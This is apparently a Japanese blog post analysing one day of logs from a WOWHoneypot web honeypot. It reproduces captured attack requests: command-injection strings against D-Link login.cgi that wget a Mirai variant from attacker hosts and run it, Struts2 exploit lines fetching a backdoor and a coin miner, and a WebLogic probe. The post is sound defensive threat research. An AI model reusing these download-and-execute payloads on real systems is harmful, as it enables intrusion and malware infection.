WOWHoneypotの簡易分析(50日目)
WOWhoneypotの2018/07/23(月) (運用50日目)の簡易分析です。
本日の総アクセス件数は 58件です。以下が全アクセスログです。
31 2018-07-23 GET /
8 2018-07-23 GET /index.action
4 2018-07-23 GET /manager/html
2 2018-07-23 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://g.mariokartayy[.]com/x%20-O%20-%3E%20/tmp/x;sh%20/tmp/x%27$
2 2018-07-23 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.172.164[.]41/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
2 2018-07-23 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://178.128.11[.]199/qtx.mips%20-O%20-%3E%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%27$
1 2018-07-23 POST /wls-wsat/CoordinatorPortType
1 2018-07-23 GET /?XDEBUG_SESSION_START=phpstorm
1 2018-07-23 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-07-23 GET /pma/scripts/setup.php
1 2018-07-23 GET /phpMyAdmin/scripts/setup.php
1 2018-07-23 GET /phpmyadmin/scripts/setup.php
1 2018-07-23 GET /phpmyadmin
1 2018-07-23 GET /MyAdmin/scripts/setup.php
1 2018-07-23 GET /myadmin/scripts/setup.php
件数の割には、意外と色んな種類がきました。
phpMyAdmin関連(6件)と/を除外したアクセス数です。
8 2018-07-23 GET /index.action
4 2018-07-23 GET /manager/html
2 2018-07-23 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://g.mariokartayy[.]com/x%20-O%20-%3E%20/tmp/x;sh%20/tmp/x%27$
2 2018-07-23 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.172.164[.]41/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
2 2018-07-23 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://178.128.11[.]199/qtx.mips%20-O%20-%3E%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%27$
1 2018-07-23 POST /wls-wsat/CoordinatorPortType
1 2018-07-23 GET /?XDEBUG_SESSION_START=phpstorm
1 2018-07-23 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
D-Linkの脆弱性を攻撃するMirai亜種のパターンが増えています。
GET /login.cgi?cli=aa%20aa%27;wget%20http://g.mariokartayy[.]com/x%20-O%20-%3E%20/tmp/x;sh%20/tmp/x%27$
User-Agent: Gemini/2.0GET /login.cgi?cli=aa%20aa%27;wget%20http://185.172.164[.]41/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
User-Agent: Hakai/2.0GET /login.cgi?cli=aa%20aa%27;wget%20http://178.128.11[.]199/qtx.mips%20-O%20-%3E%20/tmp/rz;chmod%20777%20/tmp/rz;/tmp/rz%27$
これまでUAがHello Worldだけだったものが、Gemini/2.0、Hakai/2.0、Getリクエスト以外アクセス情報なし、の3種類が来ています。
Geminiについては、以下に情報があります。
https://urlscan.io/result/48675f88-eacb-4060-a3bb-6d8342f8ca0e/
imageを見るに、xはシェルスクリプトで、該当のFQDNを持つIP配下のhxxp://209.141.42[.]3/sister/misp.gemini 等を取得します。シェルスクリプトで取得する3つのファイルがこれまでのMirai亜種と同じであり、Mirai亜種Shinoa/Satoriと同じ系統のMirai亜種Geminiと呼んで良さそうです。
それ以外の2つのダウンロードするファイルは共に同一ハッシュでこちらは実行形式のようで以下のMirai亜種でした。
https://www.virustotal.com/#/file/c15fdffa1dccfc137ba2a14c751be86307db24ebd2adbb3703d8286417bbd3b7/detection
UAに沿うなら、Mirai亜種Hakai、という名になるのでしょうか。分析時刻を見ると、23日から流行り始めたようです。
「GET /index.action」はStruts2の脆弱性を攻撃するものです。以下4種類のwgetが含まれています。
wget -c hxxp://aaa.linuxa[.]club:57843/linux
83f47074d90e0b3c91b3cf03228/detection
wget -P /tmp hxxp://hfs.mhacker[.]cc:9278/Linux.server
wget -c hxxp://103.55.13[.]68:81/servic
wget -c hxxp://103.55.13[.]68:81/server
一番上のものはLinux系BackdoorのDoflooでした。
https://www.virustotal.com/#/file/430741e10fedd90995f31a62bbfccbac73f64
それ以外の3つは同一ハッシュのCoinMinerでした。
https://www.virustotal.com/#/file/04c587db92e7dc20ee5b6203357909f0075e11aa1088cca98d24652b5cc8351a/detection
「 GET /manager/html」はTomcatの管理ページの調査です。
「/wls-wsat/」へのアクセスはWeblogicの脆弱性を攻撃するものです。
POST /wls-wsat/CoordinatorPortType
http://91.211.88.12:3323/cve-2017-10271?target=(ハニポのIP)%3A80%2Fwls-wsat%2FCoordinatorPortType
このファイルを調査してみると以下のように0サイズのファイルのようです。
https://www.virustotal.com/#/url/dea678963e0cddabf5806110922e6b293d0065b40a09863287e7f9ae0fef0812/detection
またURLから色々なスキャンを広いIPに対して投げているものと予測され、後でアクセスログから脆弱なものを探しているのではないかと推測されます。
その他は、最近継続してきている以下2種類です。
・ZmEuによるphpMyAdminに対するスキャン行為
・XDebugというPHPをリモートでデバッグするツールへの調査行為
本日のハンティングログは以下です。
2 2018-07-23 wget -P /tmp hxxp://hfs.mhacker[.]cc:9278/Linux.server
2 2018-07-23 wget hxxp://g.mariokartayy[.]com/x
2 2018-07-23 wget hxxp://185.172.164[.]41/e
2 2018-07-23 wget hxxp://178.128.11[.]199/qtx.mips
2 2018-07-23 wget -c hxxp://aaa.linuxa[.]club:57843/linux
1 2018-07-23 wget -c hxxp://103.55.13[.]68:81/servic
1 2018-07-23 wget -c hxxp://103.55.13[.]68:81/server
以上です。
